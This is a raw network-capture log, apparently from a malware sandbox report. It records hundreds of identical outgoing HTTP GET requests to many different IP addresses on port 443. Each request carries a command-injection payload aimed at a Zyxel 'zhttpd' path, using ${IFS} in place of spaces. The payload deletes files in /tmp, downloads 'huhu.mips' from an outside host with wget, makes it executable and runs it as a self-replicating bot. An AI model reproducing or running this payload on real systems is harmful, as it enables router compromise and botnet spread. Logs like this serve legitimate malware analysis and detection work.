                                              Jan 29, 2024 07:02:58.503277063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              161192.168.2.1441166130.199.106.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503279924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              162192.168.2.1456406130.103.120.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503279924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              163192.168.2.144957857.185.9.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503290892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              164192.168.2.144005675.151.45.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503333092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              165192.168.2.143565645.185.98.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503388882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              166192.168.2.1441472138.202.98.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503462076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              167192.168.2.1439076160.63.139.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503464937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              168192.168.2.1444902142.12.110.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503468037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              169192.168.2.145968432.2.47.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503489971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              170192.168.2.1440102104.225.106.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503494978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              171192.168.2.1436218181.170.178.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503561974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              172192.168.2.144159286.140.43.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503599882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              173192.168.2.1458732146.187.205.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503628016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              174192.168.2.143937490.21.204.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503742933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              175192.168.2.1443628114.190.101.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503762960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              176192.168.2.1443386194.46.16.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503760099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              177192.168.2.144267839.9.121.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503765106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              178192.168.2.144743667.223.63.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503760099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              179192.168.2.1455582200.142.39.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503779888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              180192.168.2.1440004183.7.205.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503838062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              181192.168.2.144375463.184.113.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503856897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              182192.168.2.1450680221.246.152.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503963947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              183192.168.2.1441630180.101.53.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503973007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              184192.168.2.1440736163.79.107.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503983974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              185192.168.2.1437608145.199.142.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503983974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              186192.168.2.1454808152.22.189.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.503998041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              187192.168.2.145076650.67.14.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504060030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              188192.168.2.144952027.36.254.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504125118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              189192.168.2.143969273.16.209.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504152060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              190192.168.2.1440614190.43.12.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504154921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              191192.168.2.145274060.46.54.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504154921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              192192.168.2.143681057.2.80.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504180908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              193192.168.2.1445144139.157.225.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504220009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              194192.168.2.1438198207.246.188.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504272938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              195192.168.2.144793045.153.190.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504311085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              196192.168.2.1438856140.222.59.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504348040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              197192.168.2.14518609.248.144.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504364014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              198192.168.2.143397692.180.229.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504414082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              199192.168.2.1445844187.128.255.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504462957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              200192.168.2.144569685.146.137.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504476070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              201192.168.2.1456066133.224.245.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504518032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              202192.168.2.143684832.120.44.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504554987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              203192.168.2.144133651.71.96.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504569054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              204192.168.2.143753464.114.154.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504610062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              205192.168.2.1433570187.71.195.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504643917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              206192.168.2.144307486.105.11.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504681110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              207192.168.2.144007082.66.41.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504713058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              208192.168.2.144194083.86.105.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504759073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              209192.168.2.1451670208.119.104.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504772902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              210192.168.2.14505448.250.214.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504802942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              211192.168.2.144436463.219.54.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504844904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              212192.168.2.1448528166.19.39.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504909992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              213192.168.2.144636478.111.74.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504930973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              214192.168.2.145081445.50.180.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504982948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              215192.168.2.1441960221.131.109.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.504997015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              216192.168.2.145298898.238.167.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505155087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              217192.168.2.1456106147.245.117.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505155087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              218192.168.2.1457080117.243.245.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505186081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              219192.168.2.14468208.13.103.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505275965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              220192.168.2.1448954175.168.229.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505278111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              221192.168.2.1454620194.71.174.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505278111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              222192.168.2.143291682.141.169.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505284071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              223192.168.2.1447142126.147.147.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505311966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              224192.168.2.1433326187.50.43.190443
                                              TimestampBytes transferredDirectionData
